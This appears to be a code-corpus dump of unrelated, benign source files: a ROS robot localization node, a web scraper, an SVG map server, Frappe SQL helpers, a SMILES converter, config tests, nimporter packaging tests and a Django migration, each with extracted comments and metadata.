if rospy.Time.now() - self.lifetimer > rospy.Duration(self.duckiebot_lifetime):
T = TransformStamped()
T.transform.translation.z = 1000 # Throw it 1km in the air
T.transform.rotation.w = 1
T.header.frame_id = self.world_frame
T.header.stamp = rospy.Time.now()
T.child_frame_id = self.duckiebot_frame
self.pub_tf.publish(TFMessage([T]))
def publish_sign_highlight(self, id):
# Publish a highlight marker on the sign that is seen by the robot
m = Marker()
m.header.frame_id="tag_{id}".format(id=id)
m.header.stamp = rospy.Time.now()
m.id=id
m.lifetime = rospy.Duration(self.highlight_lifetime)
m.type = Marker.CYLINDER
p = m.pose.position
o = m.pose.orientation
c = m.color
s = m.scale
s.x, s.y, s.z = (0.1, 0.1, 0.3)
p.z = 0.15
c.a, c.r, c.g, c.b = (0.2, 0.9, 0.9, 0.0)
o.w = 1
self.pub_rviz.publish(m)
def pose_to_matrix(self, p):
# Return the 4x4 homogeneous matrix for a PoseStamped.msg p from the geometry_msgs
trans = (p.pose.position.x, p.pose.position.y, p.pose.position.z)
rot = (p.pose.orientation.x, p.pose.orientation.y, p.pose.orientation.z, p.pose.orientation.w)
return np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
def transform_to_matrix(self, T):
# Return the 4x4 homogeneous matrix for a TransformStamped.msg T from the geometry_msgs
trans = (T.translation.x, T.translation.y, T.translation.z)
rot = (T.rotation.x, T.rotation.y, T.rotation.z, T.rotation.w)
return np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
def matrix_to_transform(self, M):
# Return a TransformStamped.msg T from the geometry_msgs from a 4x4 homogeneous matrix
T=Transform()
(T.translation.x, T.translation.y, T.translation.z) = tr.translation_from_matrix(M)
(T.rotation.x, T.rotation.y, T.rotation.z, T.rotation.w) = tr.quaternion_from_matrix(M)
return T
def setupParam(self, param_name, default_value):
value = rospy.get_param(param_name, default_value)
rospy.set_param(param_name, value) #Write to parameter server for transparancy
rospy.loginfo("[%s] %s = %s " % (self.node_name, param_name, value))
return value
if __name__ == '__main__':
rospy.init_node('localization_node', anonymous=False)
localization_node = LocalizationNode()
rospy.spin()
| #!/usr/bin/env python
import rospy
#from apriltags_ros.msg import AprilTagDetectionArray
from duckietown_msgs.msg import AprilTagsWithInfos
import tf2_ros
from tf2_msgs.msg import TFMessage
import tf.transformations as tr
from geometry_msgs.msg import Transform, TransformStamped
import numpy as np
from localization import PoseAverage
from visualization_msgs.msg import Marker
# Localization Node
# Author: <NAME>
# Inputs: apriltags/duckietown_msgs/AprilTags - A list of april tags in a camera frame
# Outputs: pose2d/duckietown_msgs/Pose2dStamped - The estimated pose of the robot in the world frame in 2D coordinates
# pose3d/geometry_msgs/PoseStamped - The estimated pose of the robot in the world frame in 3D coordinates
class LocalizationNode(object):
def __init__(self):
self.node_name = 'localization_node'
# Constants
self.world_frame = "world"
self.duckiebot_frame = "duckiebot"
self.duckiebot_lifetime = self.setupParam("~duckiebot_lifetime", 5) # The number of seconds to keep the duckiebot alive bewtween detections
self.highlight_lifetime = self.setupParam("~highlight_lifetime", 3) # The number of seconds to keep a sign highlighted after a detection
# Setup the publishers and subscribers
self.sub_april = rospy.Subscriber("~apriltags", AprilTagsWithInfos, self.tag_callback)
self.pub_tf = rospy.Publisher("/tf", TFMessage, queue_size=1, latch=True)
self.pub_rviz = rospy.Publisher("/sign_highlights", Marker, queue_size=1, latch=True)
# Setup the transform listener
self.tfbuf = tf2_ros.Buffer()
self.tfl = tf2_ros.TransformListener(self.tfbuf)
# Use a timer to make the duckiebot disappear
self.lifetimer = rospy.Time.now()
self.publish_duckie_marker()
rospy.loginfo("[%s] has started", self.node_name)
def tag_callback(self, msg_tag):
# Listen for the transform of the tag in the world
avg = PoseAverage.PoseAverage()
for tag in msg_tag.detections:
try:
Tt_w = self.tfbuf.lookup_transform(self.world_frame, "tag_{id}".format(id=tag.id), rospy.Time(), rospy.Duration(1))
Mtbase_w=self.transform_to_matrix(Tt_w.transform)
Mt_tbase = tr.concatenate_matrices(tr.translation_matrix((0,0,0.17)), tr.euler_matrix(0,0,np.pi))
Mt_w = tr.concatenate_matrices(Mtbase_w,Mt_tbase)
Mt_r=self.pose_to_matrix(tag.pose)
Mr_t=np.linalg.inv(Mt_r)
Mr_w=np.dot(Mt_w,Mr_t)
Tr_w = self.matrix_to_transform(Mr_w)
avg.add_pose(Tr_w)
self.publish_sign_highlight(tag.id)
except(tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException) as ex:
rospy.logwarn("Error looking up transform for tag_%s", tag.id)
rospy.logwarn(ex.message)
Tr_w = avg.get_average() # Average of the opinions
# Broadcast the robot transform
if Tr_w is not None:
# Set the z translation, and x and y rotations to 0
Tr_w.translation.z = 0
rot = Tr_w.rotation
rotz=tr.euler_from_quaternion((rot.x, rot.y, rot.z, rot.w))[2]
(rot.x, rot.y, rot.z, rot.w) = tr.quaternion_from_euler(0, 0, rotz)
T = TransformStamped()
T.transform = Tr_w
T.header.frame_id = self.world_frame
T.header.stamp = rospy.Time.now()
T.child_frame_id = self.duckiebot_frame
self.pub_tf.publish(TFMessage([T]))
self.lifetimer = rospy.Time.now()
def publish_duckie_marker(self):
# Publish a duckiebot transform far away unless the timer was reset
rate = rospy.Rate(10)
while not rospy.is_shutdown():
rate.sleep()
if rospy.Time.now() - self.lifetimer > rospy.Duration(self.duckiebot_lifetime):
T = TransformStamped()
T.transform.translation.z = 1000 # Throw it 1km in the air
T.transform.rotation.w = 1
T.header.frame_id = self.world_frame
T.header.stamp = rospy.Time.now()
T.child_frame_id = self.duckiebot_frame
self.pub_tf.publish(TFMessage([T]))
def publish_sign_highlight(self, id):
# Publish a highlight marker on the sign that is seen by the robot
m = Marker()
m.header.frame_id="tag_{id}".format(id=id)
m.header.stamp = rospy.Time.now()
m.id=id
m.lifetime = rospy.Duration(self.highlight_lifetime)
m.type = Marker.CYLINDER
p = m.pose.position
o = m.pose.orientation
c = m.color
s = m.scale
s.x, s.y, s.z = (0.1, 0.1, 0.3)
p.z = 0.15
c.a, c.r, c.g, c.b = (0.2, 0.9, 0.9, 0.0)
o.w = 1
self.pub_rviz.publish(m)
def pose_to_matrix(self, p):
# Return the 4x4 homogeneous matrix for a PoseStamped.msg p from the geometry_msgs
trans = (p.pose.position.x, p.pose.position.y, p.pose.position.z)
rot = (p.pose.orientation.x, p.pose.orientation.y, p.pose.orientation.z, p.pose.orientation.w)
return np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
def transform_to_matrix(self, T):
# Return the 4x4 homogeneous matrix for a TransformStamped.msg T from the geometry_msgs
trans = (T.translation.x, T.translation.y, T.translation.z)
rot = (T.rotation.x, T.rotation.y, T.rotation.z, T.rotation.w)
return np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
def matrix_to_transform(self, M):
# Return a TransformStamped.msg T from the geometry_msgs from a 4x4 homogeneous matrix
T=Transform()
(T.translation.x, T.translation.y, T.translation.z) = tr.translation_from_matrix(M)
(T.rotation.x, T.rotation.y, T.rotation.z, T.rotation.w) = tr.quaternion_from_matrix(M)
return T
def setupParam(self, param_name, default_value):
value = rospy.get_param(param_name, default_value)
rospy.set_param(param_name, value) #Write to parameter server for transparancy
rospy.loginfo("[%s] %s = %s " % (self.node_name, param_name, value))
return value
if __name__ == '__main__':
rospy.init_node('localization_node', anonymous=False)
localization_node = LocalizationNode()
rospy.spin() | en | 0.696005 | #!/usr/bin/env python #from apriltags_ros.msg import AprilTagDetectionArray # Localization Node # Author: <NAME> # Inputs: apriltags/duckietown_msgs/AprilTags - A list of april tags in a camera frame # Outputs: pose2d/duckietown_msgs/Pose2dStamped - The estimated pose of the robot in the world frame in 2D coordinates # pose3d/geometry_msgs/PoseStamped - The estimated pose of the robot in the world frame in 3D coordinates # Constants # The number of seconds to keep the duckiebot alive bewtween detections # The number of seconds to keep a sign highlighted after a detection # Setup the publishers and subscribers # Setup the transform listener # Use a timer to make the duckiebot disappear # Listen for the transform of the tag in the world # Average of the opinions # Broadcast the robot transform # Set the z translation, and x and y rotations to 0 # Publish a duckiebot transform far away unless the timer was reset # Throw it 1km in the air # Publish a highlight marker on the sign that is seen by the robot # Return the 4x4 homogeneous matrix for a PoseStamped.msg p from the geometry_msgs # Return the 4x4 homogeneous matrix for a TransformStamped.msg T from the geometry_msgs # Return a TransformStamped.msg T from the geometry_msgs from a 4x4 homogeneous matrix #Write to parameter server for transparancy | 2.452056 | 2 |
gen_data/get_teams.py | wusui/NCAA2019 | 0 | 8059 | #!/usr/bin/python
# pylint: disable=W0223
"""
Get a list of teams
"""
from html.parser import HTMLParser
import requests
class ChkTeams(HTMLParser):
"""
Extract team names from page
"""
def __init__(self):
HTMLParser.__init__(self)
self.retval = []
def handle_starttag(self, tag, attrs):
for apt in attrs:
if apt[0] == 'title':
if apt[1] != "ESPN Search":
self.retval.append(apt[1])
DATALOC = "http://www.espn.com/mens-college-basketball/tournament/bracket"
def check_teams():
"""
Extract a list of teams (schools)
"""
req = requests.get(DATALOC)
parser = ChkTeams()
parser.feed(req.text)
retv = parser.retval
return retv[8:]
def make_team_list():
"""
Call check_teams and stick result in text file
"""
listv = check_teams()
with open('teams.txt', 'w') as ofile:
for team in listv:
ofile.write(team + '\n')
if __name__ == '__main__':
make_team_list()
| #!/usr/bin/python
# pylint: disable=W0223
"""
Get a list of teams
"""
from html.parser import HTMLParser
import requests
class ChkTeams(HTMLParser):
"""
Extract team names from page
"""
def __init__(self):
HTMLParser.__init__(self)
self.retval = []
def handle_starttag(self, tag, attrs):
for apt in attrs:
if apt[0] == 'title':
if apt[1] != "ESPN Search":
self.retval.append(apt[1])
DATALOC = "http://www.espn.com/mens-college-basketball/tournament/bracket"
def check_teams():
"""
Extract a list of teams (schools)
"""
req = requests.get(DATALOC)
parser = ChkTeams()
parser.feed(req.text)
retv = parser.retval
return retv[8:]
def make_team_list():
"""
Call check_teams and stick result in text file
"""
listv = check_teams()
with open('teams.txt', 'w') as ofile:
for team in listv:
ofile.write(team + '\n')
if __name__ == '__main__':
make_team_list()
| en | 0.723916 | #!/usr/bin/python # pylint: disable=W0223 Get a list of teams Extract team names from page Extract a list of teams (schools) Call check_teams and stick result in text file | 3.30506 | 3 |
svgserver/app.py | omniscale/svgserver | 2 | 8060 | <reponame>omniscale/svgserver
import codecs
import tempfile
from contextlib import closing
from .cgi import CGIClient
from .combine import CombineSVG
from .mapserv import MapServer, InternalError
from .tree import build_tree
def _recursive_add_layer(nodes, params, svg, mapserver, translations):
for node in nodes:
group_name = format_group_name(node, translations)
svg.push_group(group_name)
if node.layer:
params["layers"] = node.layer
params["format"] = "image/svg+xml"
resp = mapserver.get(params)
if resp.headers["Content-type"] != "image/svg+xml":
raise InternalError(
"received non SVG response for layer %s:\n%s\n%s"
% (node.layer, resp.headers, resp.read())
)
svg.add(resp)
if node.subs:
_recursive_add_layer(node.subs, params, svg, mapserver, translations)
svg.pop_group()
def format_group_name(node, translations):
if isinstance(node.name, tuple):
return ', '.join(translations.get(n, n) for n in node.name)
return translations.get(node.name, node.name)
def layered_svg(params, translations={}, mapserver_binary="mapserv", root_id='map'):
mapserver = MapServer(binary=mapserver_binary)
layers = mapserver.layer_names(params)
nodes = build_tree(layers)
root_id = translations.get(root_id, root_id)
f = tempfile.TemporaryFile()
try:
with CombineSVG(f, root_id=root_id) as svg:
_recursive_add_layer(
nodes,
params=params,
svg=svg,
mapserver=mapserver,
translations=translations,
)
f.seek(0)
return f
except:
# close to remove temporary file
f.close()
raise
def load_translations(filename):
if not filename:
return {}
translations = {}
with codecs.open(filename, encoding="utf8") as f:
for line in f:
line = line.strip()
if not line or line.startswith('#'):
continue
if '=' not in line:
continue
key, translation = line.split('=', 1)
translations[key.strip()] = translation.strip()
return translations
if __name__ == "__main__":
import os
import logging
logging.basicConfig(level=logging.DEBUG)
params = {
"service": "WMS",
"version": "1.1.1",
"request": "GetMap",
"width": 1234,
"height": 769,
"srs": "EPSG:3857",
"styles": "",
"format": "image/svg+xml",
"bbox": "775214.9923087133,6721788.224989068,776688.4414913012,6722705.993822992",
"map": os.path.abspath(os.path.dirname(__file__) + "/../tests/ms.map"),
}
with closing(layered_svg(params)) as f:
print(f.read())
| import codecs
import tempfile
from contextlib import closing
from .cgi import CGIClient
from .combine import CombineSVG
from .mapserv import MapServer, InternalError
from .tree import build_tree
def _recursive_add_layer(nodes, params, svg, mapserver, translations):
for node in nodes:
group_name = format_group_name(node, translations)
svg.push_group(group_name)
if node.layer:
params["layers"] = node.layer
params["format"] = "image/svg+xml"
resp = mapserver.get(params)
if resp.headers["Content-type"] != "image/svg+xml":
raise InternalError(
"received non SVG response for layer %s:\n%s\n%s"
% (node.layer, resp.headers, resp.read())
)
svg.add(resp)
if node.subs:
_recursive_add_layer(node.subs, params, svg, mapserver, translations)
svg.pop_group()
def format_group_name(node, translations):
if isinstance(node.name, tuple):
return ', '.join(translations.get(n, n) for n in node.name)
return translations.get(node.name, node.name)
def layered_svg(params, translations={}, mapserver_binary="mapserv", root_id='map'):
mapserver = MapServer(binary=mapserver_binary)
layers = mapserver.layer_names(params)
nodes = build_tree(layers)
root_id = translations.get(root_id, root_id)
f = tempfile.TemporaryFile()
try:
with CombineSVG(f, root_id=root_id) as svg:
_recursive_add_layer(
nodes,
params=params,
svg=svg,
mapserver=mapserver,
translations=translations,
)
f.seek(0)
return f
except:
# close to remove temporary file
f.close()
raise
def load_translations(filename):
if not filename:
return {}
translations = {}
with codecs.open(filename, encoding="utf8") as f:
for line in f:
line = line.strip()
if not line or line.startswith('#'):
continue
if '=' not in line:
continue
key, translation = line.split('=', 1)
translations[key.strip()] = translation.strip()
return translations
if __name__ == "__main__":
import os
import logging
logging.basicConfig(level=logging.DEBUG)
params = {
"service": "WMS",
"version": "1.1.1",
"request": "GetMap",
"width": 1234,
"height": 769,
"srs": "EPSG:3857",
"styles": "",
"format": "image/svg+xml",
"bbox": "775214.9923087133,6721788.224989068,776688.4414913012,6722705.993822992",
"map": os.path.abspath(os.path.dirname(__file__) + "/../tests/ms.map"),
}
with closing(layered_svg(params)) as f:
print(f.read()) | en | 0.742444 | # close to remove temporary file | 2.275507 | 2 |
11_app/script/purchase_order.py | israillaky/ERPOSAPP11 | 0 | 8061 | import frappe
@frappe.whitelist()
def filt_itemby_supplier(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""Select parent from `tabItem Supplier` where supplier= %s""",(filters.get("supplier")));
@frappe.whitelist()
def filteritem(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select item_code, item_name, item_group, volume, item_type,stock_uom from `tabItem`"""); | import frappe
@frappe.whitelist()
def filt_itemby_supplier(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""Select parent from `tabItem Supplier` where supplier= %s""",(filters.get("supplier")));
@frappe.whitelist()
def filteritem(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select item_code, item_name, item_group, volume, item_type,stock_uom from `tabItem`"""); | en | 0.368554 | Select parent from `tabItem Supplier` where supplier= %s select item_code, item_name, item_group, volume, item_type,stock_uom from `tabItem` | 1.804717 | 2 |
src/common/bio/smiles.py | duttaprat/proteinGAN | 8 | 8062 | from common.bio.constants import SMILES_CHARACTER_TO_ID, ID_TO_SMILES_CHARACTER
def from_smiles_to_id(data, column):
"""Converts sequences from smiles to ids
Args:
data: data that contains characters that need to be converted to ids
column: a column of the dataframe that contains characters that need to be converted to ids
Returns:
array of ids
"""
return [[SMILES_CHARACTER_TO_ID[char] for char in val] for index, val in data[column].iteritems()]
def from_id_from_smiles(data, column):
"""Converts sequences from ids to smiles characters
Args:
data: data that contains ids that need to be converted to characters
column: a column of the dataframe that contains ids that need to be converted to characters
Returns:
array of characters
"""
return [[ID_TO_SMILES_CHARACTER[id] for id in val] for index, val in data[column].iteritems()]
| from common.bio.constants import SMILES_CHARACTER_TO_ID, ID_TO_SMILES_CHARACTER
def from_smiles_to_id(data, column):
"""Converts sequences from smiles to ids
Args:
data: data that contains characters that need to be converted to ids
column: a column of the dataframe that contains characters that need to be converted to ids
Returns:
array of ids
"""
return [[SMILES_CHARACTER_TO_ID[char] for char in val] for index, val in data[column].iteritems()]
def from_id_from_smiles(data, column):
"""Converts sequences from ids to smiles characters
Args:
data: data that contains ids that need to be converted to characters
column: a column of the dataframe that contains ids that need to be converted to characters
Returns:
array of characters
"""
return [[ID_TO_SMILES_CHARACTER[id] for id in val] for index, val in data[column].iteritems()]
| en | 0.885739 | Converts sequences from smiles to ids Args: data: data that contains characters that need to be converted to ids column: a column of the dataframe that contains characters that need to be converted to ids Returns: array of ids Converts sequences from ids to smiles characters Args: data: data that contains ids that need to be converted to characters column: a column of the dataframe that contains ids that need to be converted to characters Returns: array of characters | 3.250393 | 3 |
test/lib_config_test.py | yokoyama-flogics/ibp_monitor_2 | 3 | 8063 | import os
import sys
import unittest
# Set Python search path to the parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from lib.config import *
class TestLibConfig(unittest.TestCase):
def test_config_noconfigfile(self):
config = BeaconConfigParser('not_exist.cfg')
with self.assertRaises(ConfigParser.NoSectionError):
config.getpath('Test', 'dbdir')
def test_config_default(self):
import os
os.environ['HOME'] = 'notexist'
config = BeaconConfigParser()
with self.assertRaises(ConfigParser.NoSectionError):
config.get('Signal', 'samplerate')
def test_config_items(self):
config = BeaconConfigParser('test_config.cfg')
self.assertEqual(config.get('Test', 'dbdir'), 'nodb')
self.assertEqual(config.getpath('Test', 'dbdir'), 'nodb')
self.assertEqual(config.getint('Signal', 'samplerate'), 16000)
if __name__ == "__main__":
unittest.main(buffer=True)
| import os
import sys
import unittest
# Set Python search path to the parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from lib.config import *
class TestLibConfig(unittest.TestCase):
def test_config_noconfigfile(self):
config = BeaconConfigParser('not_exist.cfg')
with self.assertRaises(ConfigParser.NoSectionError):
config.getpath('Test', 'dbdir')
def test_config_default(self):
import os
os.environ['HOME'] = 'notexist'
config = BeaconConfigParser()
with self.assertRaises(ConfigParser.NoSectionError):
config.get('Signal', 'samplerate')
def test_config_items(self):
config = BeaconConfigParser('test_config.cfg')
self.assertEqual(config.get('Test', 'dbdir'), 'nodb')
self.assertEqual(config.getpath('Test', 'dbdir'), 'nodb')
self.assertEqual(config.getint('Signal', 'samplerate'), 16000)
if __name__ == "__main__":
unittest.main(buffer=True)
| en | 0.606285 | # Set Python search path to the parent directory | 2.786767 | 3 |
tests/test_installation.py | phdye/nimporter | 0 | 8064 | <reponame>phdye/nimporter
"""
Test to make sure that libraries built with Nimporter can be installed via Pip.
"""
import sys, os, subprocess, shutil, pkg_resources, json, warnings
from pathlib import Path
import pytest
import nimporter
PYTHON = 'python' if sys.platform == 'win32' else 'python3'
PIP = 'pip' if shutil.which('pip') else 'pip3'
@pytest.mark.integration_test
def test_ensure_nimporter_installed():
"Make sure that Nimporter is installed before running integration tests."
libs = {lib.key.lower() for lib in pkg_resources.working_set}
assert 'nimporter' in libs, (
f'Nimporter is not installed. Please install via:'
f'`{PIP} install .` before running the integration tests.'
)
@pytest.mark.integration_test
def test_create_sdist():
"Test the successful creation of a source distribution."
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py sdist'.split()).wait()
dist = Path('dist')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert egg.exists()
targets = list(dist.glob('project1*'))
assert len(targets) == 1
assert targets[0].exists()
# Make sure the appropriate compiler is being used
for extension in Path('nim-extensions').iterdir():
(nim_build_data_file,) = extension.glob('*json')
nim_build_data = json.loads(nim_build_data_file.read_text())
expected = nimporter.NimCompiler.get_compatible_compiler()
installed_ccs = nimporter.NimCompiler.get_installed_compilers()
if not expected:
warnings.warn(
f'No compatible C compiler installed: {installed_ccs}'
)
else:
cc_path = installed_ccs[expected]
actual = nim_build_data['linkcmd'].split()[0].strip()
if not actual.startswith(cc_path.stem):
warnings.warn(
f'Nim used a different C compiler than what Python '
f'expects. Python uses {cc_path.stem} and Nim used '
f'{actual}'
)
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(egg.absolute()))
@pytest.mark.integration_test
def test_create_bdist():
"Test the successful create of a wheel."
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py bdist_wheel'.split()).wait()
dist = Path('dist')
build = Path('build')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert build.exists()
assert egg.exists()
targets = list(Path('dist').glob('project1*.whl'))
assert len(targets) == 1
assert targets[0].exists()
# Make sure the appropriate compiler is being used
for extension in Path('nim-extensions').iterdir():
(nim_build_data_file,) = extension.glob('*json')
nim_build_data = json.loads(nim_build_data_file.read_text())
expected = nimporter.NimCompiler.get_compatible_compiler()
installed_ccs = nimporter.NimCompiler.get_installed_compilers()
if not expected:
warnings.warn(
f'No compatible C compiler installed: {installed_ccs}'
)
else:
cc_path = installed_ccs[expected]
actual = nim_build_data['linkcmd'].split()[0].strip()
if not actual.startswith(cc_path.stem):
warnings.warn(
f'Nim used a different C compiler than what Python '
f'expects. Python uses {cc_path.stem} and Nim used '
f'{actual}'
)
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(build.absolute()))
shutil.rmtree(str(egg.absolute()))
@pytest.mark.slow_integration_test
def test_install_sdist():
"Make sure that the project can be installed by Pip"
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py sdist'.split()).wait()
dist = Path('dist')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert egg.exists()
targets = list(dist.glob('project1*'))
assert len(targets) == 1
(target,) = targets
assert target.exists()
subprocess.Popen(f'{PIP} install {target}'.split()).wait()
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(egg.absolute()))
# Make sure that `tests/proj1` is not imported as a SimpleNamespace and that
# the installed library in `site-packages` is used.
with nimporter.cd('../..'):
try:
import proj1
assert proj1
import proj1.performance
assert proj1.performance
import proj1.lib1
assert proj1.lib1
assert proj1.foo
assert proj1.bar
assert proj1.baz
assert proj1.baz() == 1
except Exception as e:
warnings.warn(str(e))
# Cannot delete a DLL in use by another process on Windows
if sys.platform != 'win32':
subprocess.Popen(f'{PIP} uninstall project1 -y'.split()).wait()
@pytest.mark.slow_integration_test
def test_install_bdist():
"Make sure that the wheel can be installed by Pip"
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py bdist_wheel'.split()).wait()
dist = Path('dist')
build = Path('build')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert build.exists()
assert egg.exists()
targets = list(Path('dist').glob('project1*.whl'))
assert len(targets) == 1
wheel = targets[0]
assert wheel.exists()
subprocess.Popen(f'{PIP} install {wheel}'.split()).wait()
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(build.absolute()))
shutil.rmtree(str(egg.absolute()))
# Make sure that `tests/proj1` is not imported as a SimpleNamespace and that
# the installed library in `site-packages` is used.
with nimporter.cd('../..'):
try:
import proj1
assert proj1
import proj1.performance
assert proj1.performance
import proj1.lib1
assert proj1.lib1
assert proj1.foo
assert proj1.bar
assert proj1.baz
assert proj1.baz() == 1
except Exception as e:
warnings.warn(str(e))
# Cannot delete a DLL in use by another process on Windows
if sys.platform != 'win32':
subprocess.Popen(f'{PIP} uninstall project1 -y'.split()).wait()
| """
Test to make sure that libraries built with Nimporter can be installed via Pip.
"""
import sys, os, subprocess, shutil, pkg_resources, json, warnings
from pathlib import Path
import pytest
import nimporter
PYTHON = 'python' if sys.platform == 'win32' else 'python3'
PIP = 'pip' if shutil.which('pip') else 'pip3'
@pytest.mark.integration_test
def test_ensure_nimporter_installed():
"Make sure that Nimporter is installed before running integration tests."
libs = {lib.key.lower() for lib in pkg_resources.working_set}
assert 'nimporter' in libs, (
f'Nimporter is not installed. Please install via:'
f'`{PIP} install .` before running the integration tests.'
)
@pytest.mark.integration_test
def test_create_sdist():
"Test the successful creation of a source distribution."
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py sdist'.split()).wait()
dist = Path('dist')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert egg.exists()
targets = list(dist.glob('project1*'))
assert len(targets) == 1
assert targets[0].exists()
# Make sure the appropriate compiler is being used
for extension in Path('nim-extensions').iterdir():
(nim_build_data_file,) = extension.glob('*json')
nim_build_data = json.loads(nim_build_data_file.read_text())
expected = nimporter.NimCompiler.get_compatible_compiler()
installed_ccs = nimporter.NimCompiler.get_installed_compilers()
if not expected:
warnings.warn(
f'No compatible C compiler installed: {installed_ccs}'
)
else:
cc_path = installed_ccs[expected]
actual = nim_build_data['linkcmd'].split()[0].strip()
if not actual.startswith(cc_path.stem):
warnings.warn(
f'Nim used a different C compiler than what Python '
f'expects. Python uses {cc_path.stem} and Nim used '
f'{actual}'
)
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(egg.absolute()))
@pytest.mark.integration_test
def test_create_bdist():
"Test the successful create of a wheel."
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py bdist_wheel'.split()).wait()
dist = Path('dist')
build = Path('build')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert build.exists()
assert egg.exists()
targets = list(Path('dist').glob('project1*.whl'))
assert len(targets) == 1
assert targets[0].exists()
# Make sure the appropriate compiler is being used
for extension in Path('nim-extensions').iterdir():
(nim_build_data_file,) = extension.glob('*json')
nim_build_data = json.loads(nim_build_data_file.read_text())
expected = nimporter.NimCompiler.get_compatible_compiler()
installed_ccs = nimporter.NimCompiler.get_installed_compilers()
if not expected:
warnings.warn(
f'No compatible C compiler installed: {installed_ccs}'
)
else:
cc_path = installed_ccs[expected]
actual = nim_build_data['linkcmd'].split()[0].strip()
if not actual.startswith(cc_path.stem):
warnings.warn(
f'Nim used a different C compiler than what Python '
f'expects. Python uses {cc_path.stem} and Nim used '
f'{actual}'
)
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(build.absolute()))
shutil.rmtree(str(egg.absolute()))
@pytest.mark.slow_integration_test
def test_install_sdist():
"Make sure that the project can be installed by Pip"
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py sdist'.split()).wait()
dist = Path('dist')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert egg.exists()
targets = list(dist.glob('project1*'))
assert len(targets) == 1
(target,) = targets
assert target.exists()
subprocess.Popen(f'{PIP} install {target}'.split()).wait()
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(egg.absolute()))
# Make sure that `tests/proj1` is not imported as a SimpleNamespace and that
# the installed library in `site-packages` is used.
with nimporter.cd('../..'):
try:
import proj1
assert proj1
import proj1.performance
assert proj1.performance
import proj1.lib1
assert proj1.lib1
assert proj1.foo
assert proj1.bar
assert proj1.baz
assert proj1.baz() == 1
except Exception as e:
warnings.warn(str(e))
# Cannot delete a DLL in use by another process on Windows
if sys.platform != 'win32':
subprocess.Popen(f'{PIP} uninstall project1 -y'.split()).wait()
@pytest.mark.slow_integration_test
def test_install_bdist():
"Make sure that the wheel can be installed by Pip"
with nimporter.cd('tests/proj1'):
subprocess.Popen(f'{PYTHON} setup.py bdist_wheel'.split()).wait()
dist = Path('dist')
build = Path('build')
egg = Path('project1.egg-info')
try:
assert dist.exists()
assert build.exists()
assert egg.exists()
targets = list(Path('dist').glob('project1*.whl'))
assert len(targets) == 1
wheel = targets[0]
assert wheel.exists()
subprocess.Popen(f'{PIP} install {wheel}'.split()).wait()
finally:
shutil.rmtree(str(dist.absolute()))
shutil.rmtree(str(build.absolute()))
shutil.rmtree(str(egg.absolute()))
# Make sure that `tests/proj1` is not imported as a SimpleNamespace and that
# the installed library in `site-packages` is used.
with nimporter.cd('../..'):
try:
import proj1
assert proj1
import proj1.performance
assert proj1.performance
import proj1.lib1
assert proj1.lib1
assert proj1.foo
assert proj1.bar
assert proj1.baz
assert proj1.baz() == 1
except Exception as e:
warnings.warn(str(e))
# Cannot delete a DLL in use by another process on Windows
if sys.platform != 'win32':
subprocess.Popen(f'{PIP} uninstall project1 -y'.split()).wait() | en | 0.955609 | Test to make sure that libraries built with Nimporter can be installed via Pip. # Make sure the appropriate compiler is being used # Make sure the appropriate compiler is being used # Make sure that `tests/proj1` is not imported as a SimpleNamespace and that # the installed library in `site-packages` is used. # Cannot delete a DLL in use by another process on Windows # Make sure that `tests/proj1` is not imported as a SimpleNamespace and that # the installed library in `site-packages` is used. # Cannot delete a DLL in use by another process on Windows | 2.452555 | 2 |
hotpot_sample_dict.py | bvanaken/pytorch-pretrained-BERT | 1 | 8065 | <gh_stars>1-10
samples = {
"2_brother_plays": {
"question_parts": [range(1, 13), range(13, 17)],
"sp_parts": [range(20, 43), range(50, 60)]
}
}
| samples = {
"2_brother_plays": {
"question_parts": [range(1, 13), range(13, 17)],
"sp_parts": [range(20, 43), range(50, 60)]
}
} | none | 1 | 1.23568 | 1 |
|
src/applications/blog/migrations/0003_post_author.py | alexander-sidorov/tms-z43 | 2 | 8066 | <filename>src/applications/blog/migrations/0003_post_author.py
# Generated by Django 3.1.7 on 2021-03-24 17:41
import django.db.models.deletion
from django.conf import settings
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("blog", "0002_auto_20210323_1834"),
]
operations = [
migrations.AddField(
model_name="post",
name="author",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
]
| <filename>src/applications/blog/migrations/0003_post_author.py
# Generated by Django 3.1.7 on 2021-03-24 17:41
import django.db.models.deletion
from django.conf import settings
from django.db import migrations
from django.db import models
